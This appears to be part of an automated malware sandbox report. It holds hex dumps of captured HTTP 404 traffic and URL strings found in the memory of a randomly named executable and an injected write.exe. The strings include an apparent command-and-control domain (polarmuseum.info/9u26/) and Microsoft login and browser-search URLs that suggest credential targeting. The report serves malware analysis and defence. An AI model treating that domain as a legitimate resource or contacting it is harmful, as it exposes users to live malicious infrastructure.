            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 05 Nov 2024 14:24:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:24:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: fZXsbVktlmkz.exe, 00000007.00000002.3554169610.0000000004A7C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info
            Source: fZXsbVktlmkz.exe, 00000007.00000002.3554169610.0000000004A7C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info/9u26/
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: write.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: write.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033c
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000006.00000003.2272928050.0000000002893000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3551184016.0000000002882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
